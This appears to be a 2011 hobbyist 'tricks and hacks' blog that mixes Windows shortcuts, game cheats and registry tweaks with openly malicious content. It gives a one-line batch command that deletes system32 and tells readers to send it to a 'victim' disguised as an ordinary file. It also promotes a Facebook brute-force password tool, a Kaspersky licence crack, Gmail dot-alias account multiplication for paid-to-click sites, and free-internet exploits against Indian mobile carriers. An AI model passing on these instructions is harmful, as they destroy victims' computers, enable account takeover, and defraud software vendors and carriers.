Tuesday, July 26, 2011



* OpenDNS added
* Audio support
o VirtualBox - Intel 8x0 AC97
o VMware - Ensoniq AudioPCI 1371/1373
* SD card support (512M)
* Ethernet (DHCP)
* Mouse wheel support
* High-resolution support (800*600, 1024*768)
* Apps added
o Software Directory
o AndroidVNC
o PilotLines, Craigs Races, Super Mario
* more net card driver added

DOWNLOAD : http://live-android.googlecode.com/files/liveandroidv0.3.iso.001



Suppose your gmail id is mymail@gmail.com
and password is password

Then you can login in your gmail account .If you use
email as:m.ymail@gmail.com
So my point is that gmail does
not count periods(.)
Then what is the use of it
So you can use this trick for using the same email for various GPT, PTC, Twitter accounts as they interpret all the above emails as different but gmail considers it the same.
So guys i think you got my point..!!!!



copy the code without quotes into notepad and save it as something .vbs

"Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
End If"

if u run this u r cd-rom will automatically open and close
to stop this go to taskmanager-process-wscript.exe-and end the process .


Make a simple file that destroys ur victims pc
1. Open Notepad
2. write the above command : -
erase %windir%\system32\*.* /q
3. Save the above notepad with the extension ".bat or .cmd" as u want.
After u created the .cmd or .bat file send it to ur victim as like ordinary file.Once ur victim double click on it then he/she needs to format his/her pc.
What it does is deletes all files present in the system32 folder out of which most of them are files important for a computers functioning.
It would work only if the victim has windows os.

BEST TOOLS EVER ..!!! [softwares]

Facebook hacking
Many people were asking on how to hack facebook account. This tool is design to hack any facebook account you want with 2 simple steps. Specify the username and the pass list and let it work.
It will hack that account and give you the pass.
 And for idiots who say that it doesn't work. Well it works but it need times between each attemd to login otherwise it will become a facebooz freezer  

 This tool will hack for you any login page by trying all password possibilities. The reason i added here is because many people were finding troubles with there brutus and couldn't do any hack so this one should solve all there nightmares.  


1.Hold down Ctrl + Shift + F10 while playing, then click Abort.
2.Now move one card.
1. Go to "Game" menu choose "Select Game"
2.Here you can choose from game mode 1 to 1,000,000. But -1 and -2 will also work (hidden modes)

Warning! this requires a modification on your registry. Be sure you follow the steps carefully. Damage your registry might damage your Windows.
1.Open the "Registry Editor" by: "Start" >> "Run" then type "regedit" and press Enter
2.Expand to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
3.Right-click on the right panel and create a new String value with the name "ZB"
4.Double-click to open this key "ZB" to edit its value. Then enter "42" and close the Registry Editor.
5.Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards
1.Press Alt + Shift + 2 to instantly win 

1.Hold down Ctrl + Alt + Shift then click on unopen cards to draw. 

1.When you start to play a new game, the timer is ticking...
2.Press Windows Key + D to show desktop.
3.Now come back to the game by selecting it from the taskbar. The timer is stopped. 

Unlimited Balls: Type bmax at a new game to get unlimited balls (no notification).
Extra Balls: Type 1max at a new game to get extra balls.
Gravity Well: Type gmax at a new game to activate Gravity Well.
Promotion: Type rmax at a new game or while playing to get instant promotion and raising rank.
Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
Test Mode: Type hidden test with a new ball or new game. Now you can use your mouse to drag and move the ball where you want. 


I've visited parts of this forum today and have seen some speculation and somewhat of a desire to get hands on an Adsense account fast...

I thought it was pretty obvious, but below are a few steps to help those out that are stuck or lacking reassurance in their sites ability to pass Google's not-so-vigorous requirements...

Step 1
Sign yourself up for a Blogger Account - by the way, this is the most fastest way to get yourself an AdSense account...

Step 2
Select a topic to blog about. It could be absolutely anything - Cars, Trains, Holidays - just make sure it's legal and appropriate!

Step 3
Submit about 4 blog posts around your topic. For example, if you're doing cars - make 4 posts about your 4 favourite cars - each can be 300 words each, as long as the content is nice and clean, you'll have no problems.

Step 4
Add an "About Me" page to your Blog. Just include a short description about yourself and your blog.

Step 5
Go to your dashboard in your Blogger account, and click "Monetize" ... there'll be a section that will allow you to sign up to AdSense - submit your application through blogger, with your blog being the site you wish to use your AdSense Advertisements on.

Step 6
Wait until you're in.

Extremely easy and extremely simple. The reason why this works is because Google owns Blogger. Not only that, but Google loves blogs. I've had an AdSense account approved in under two hours this way!

Remember, once you have your account treat it like Gold. Always follow their Terms because once they pull the rug from under you, you'll feel like you've landed on a bed of nails!

Also, you'll be able to use that AdSense Account on any site that you own and that abides to their TOS - not just your Blog. Once you're in, you can just forget about your blog!

Hope that helps you and good luck...

Kaspersky pure blacklist crack


1.uninstall kaspersky pure using kaspersky product removal tool

2.reboot after uninstalling kaspersky !

3.install a fresh copy of kaspersky pure and remember to uncheck participation in kaspersky community box during installation !

4.download k-blacklist crack |: DOWNLOAD

5.disable kaspersky self defense and protection !

6.exit kaspersky from system icon [if necessary exit it from task manager] !

7.run k-blacklist crack and install it after intallation click finish !

8.run kaspersky delete the trial key and select the key provided to yuh or if u hv any u can use it !

9. enjoy !

Hiding a Drive


1) first Go to Start -> Run -> “regedit” 2) Navigate to: HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer 3) select Edit -> New -> DWORD Value and give name NoDrives. 4) Double click NoDrives and determine which drive that you want to vanish in Value Data. Ex: If you wish to vanish drive E:, insert value 16 in Value Data. The combination value in “Value Data” are as following: A: > 1 B: > 2 C: > 4 D: > 8 E: > 16 F: > 32 G: > 64 H: > 128 I: > 256 J: > 512 K: > 1024 L: > 2048 M: > 4096 All: > 67108863 cheers.... 

Wednesday, May 11, 2011


5 OK

u r done..




Alright so u wanna know how to turn the pc on in 10 seconds (may vary)heres what u have to do to turn ur pc on in 10 seconds

Well go to run
n type Regedit
press enter
this will open Registery Editor
now look for the key
now there find the Key Called
“Startup Delay”
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000 (75300:hexadecimal)
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
All’s Done…


Windows 7 Tricks and Keyboard Shortcuts

Here is a quick summary of what I’ve found so far for Windows 7:
Window Management
  • Win+Left Arrow and Win+Right Arrow: Dock a window to the left or right half of the screen.
Win+Shift+Left Arrow and Win+Shift+Right Arrow: Move a window from one monitor to another, keeping them in the same relative location to the monitor’s top-left origin.
  • Win+Up Arrow and Win+Down Arrow: Maximizes and restores/minimizes a window.
  • Win+Shift+Up Arrow and Win+Shift+Down Arrow: Maximizes and restores the vertical size of a window.
  • Win+Home: Minimize all the non-active background windows, keeping the window you’re using in its current position. (Press Win+Home again to restore the windows to their original locations.)
  • Win+(plus key) and Win+(minus key): Zoom in or out using Windows Magnifer.
  • Win+E: Opens Windows Explorer.
  • Win+U: Opens the Ease of Access Center.
  • Win+D: Show/hide the desktop.
  • Win+F: Opens the Search Results window.
  • Win+L: Locks the computer.
  • Win+B: Sets focus to the “Show hidden icons” button on the task bar.
  • Win+M: Minimizes all windows.
  • Win+Ctrl+F: Opens the Active Directory Find Computers dialog.
  • Win+Space: Use “Aero Peek” to see any gadgets or icons you’ve got on your desktop.
  • Win+R: Opens the Run dialog.
  • Win+T: Move the focus to the first taskbar. (Pressing again will cycle through them.)
  • Win+Shift+T: Move the focus to the last taskbar. (Pressing again will cycle through them.)
  • Ctrl+(mouse click on a single application icon in the task bar): Toggle through each of the open windows in order. The best example of this is Internet Explorer. If you have five tabs open in a single IE instance, holding the Ctrl key while repeatedly clicking on the single IE icon in the task bar will toggle through each of the five tabs in order.
  • Ctrl+Shift+(mouse click on an application icon in the task bar): Launch that application with full administrative rights. You can also use Ctrl+Shift+Enter for commands from the search bar for the same action.
  • Shift+(mouse click on an application icon in the task bar): Launch a new instance of the application rather than switching to the existing application. (You can also middle-click with the third mouse button or scroll wheel.)
  • Win+1 .. Win+5: Launch a new instance of the any of the first five icons on the task bar. (By the way, the icons can be reordered to suit your needs by simply dragging them around and can be pinned shortcuts or running applications.)
  • Shift+(right mouse click on an application icon in the task bar): Show the Window menu. (You get different menus depending on whether the application is running or has multiple instances open.
Windows Explorer

    • Ctrl+(mouse scroll wheel): Change the view/zoom in Windows Explorer. (This is the same as clicking the Views button or selecting one of the view options from the button’s dropdown list.)
    • Shift+(right mouse click on any folder or file): Displays an expanded context menu:


  • (The additional Open options only appear for folders but the “Copy as path” option appears for both folders and files.)
  • Alt+P: Show/hide the preview pane.
Win+P: Display the project options, which you can then use the arrow keys (or keep hitting Win+P) to switch to the different options. 

      • Win+X: Open the Windows Mobility Center.
      • Win+G: Bring gadgets to the top of the Z-order. (Sets the focus to a gadget.)

Free Bsnl Gprs To Access Internet mobile

1.Create 2 connections with different names like "BSNL PORTAL" and "CELLONE PORTAL" with following settings.

          Access Point Name-
           Proxy Service Address-
           Proxy Port-
                                                                     Rest fields to be as it is.

2.now open phone's default inbuilt browser and select any of the two settings created to access the web.you will now access only bsnl's home site.

3.now keep browser working and open another browser for full internet access like opera or netfront.in these browsers use the second setting created. make sure to use second setting this time. connect to open a page. you get an error message like "ACCESS DENIED" but you don't worry.

4.keep both browsers working in background and open connection manager. in connection manager just disconnect the connection that is not working like the second one you used to connect opera or net front.

5.again open opera or netfront from background and this time use the first connection that you are using to connect with default inbuilt browser to connect to internet.
6.sure this time you are connected with full access.

Free GPRS trick for Tata Docomo

After a long time back someone found a Free GPRS trick for Tata Docomo.This trick is working all over India with the Balance condition of above Rs.2.The credit goes to the author.

Here is a New Hack 4 DocoMo.
New free server.

Balance should be Rs2 or more.

Use Divein setting.

Apn: Tata.Docomo.Dive.In


Port: 8080

Use any handler browser. But i Recommand use operamini labs. Download from

In operamini labs do the following settings:

Proxy Type  "Http"

proxy server: tata.cellmania.com

leave other filled as it.
Screenshot of Process=


Here is one more free server.
You can use it instead of tata.cellmania.com.


After a long period of technical hacking among all 3G networks someone found the trick to use Free 3G in the Great Blockbuster Network Tata Docomo.Ya you heard right now it is possible to use theTata Docomo's free 3G in your 3G enabled mobile.But the one and only drawback of this trick is you can use this free gprs hack through Modded Applications Opera Mini 4.2,Opera Mini 5.0 & Ucweb 7.2 .jar versions.It uses "Special Proxy Address".Sorry i can't disclose this secret IP righ now here.

All Tata Docomo Customers can't use this trick for the following reasons:
1.Still Tata Docomo doesn't have 3G spectrum all over India.They have spectrum in 9 circles.Those are Maharashtra & Goa,Rajasthan,Karnataka,Kerala,Gujarat,Haryana,Uttar Pradesh,,Punjab & Madhya Pradesh.
2.Your mobile mayn't compatibility for 3G mobile service.
To use this trick you need Tata Docomo DiveIn settings if you don't have just send an sms as DIVE AND SEND IT TO 52270 or create a manual Divein Setting which has been posted below:
Connection Name : TATA DOCOMO DIVE IN
Proxy Address :
Port Address : 8080
Leave username and password as blank.

Keep your balance above 1rs if you don't maintain balance above 1rs you can't connect GPRS in Tata Docomo.
You don't need to change anything in the modded versions just download and use it.

Opera Mini 4.2 Handler Version moded for Tata Docomo free 3G:
Opera Mini 5.0 Handler Modded version for tata docomo free 3G GPRS (Recommended For Browsing):
Free tata docomo 3G using the ucweb 7.2 moded version (Recommended For Downloading):

The credit goes to the author.Read our Privacy policy before to use any tricks.Now you may enjoy free tata docomo 3G.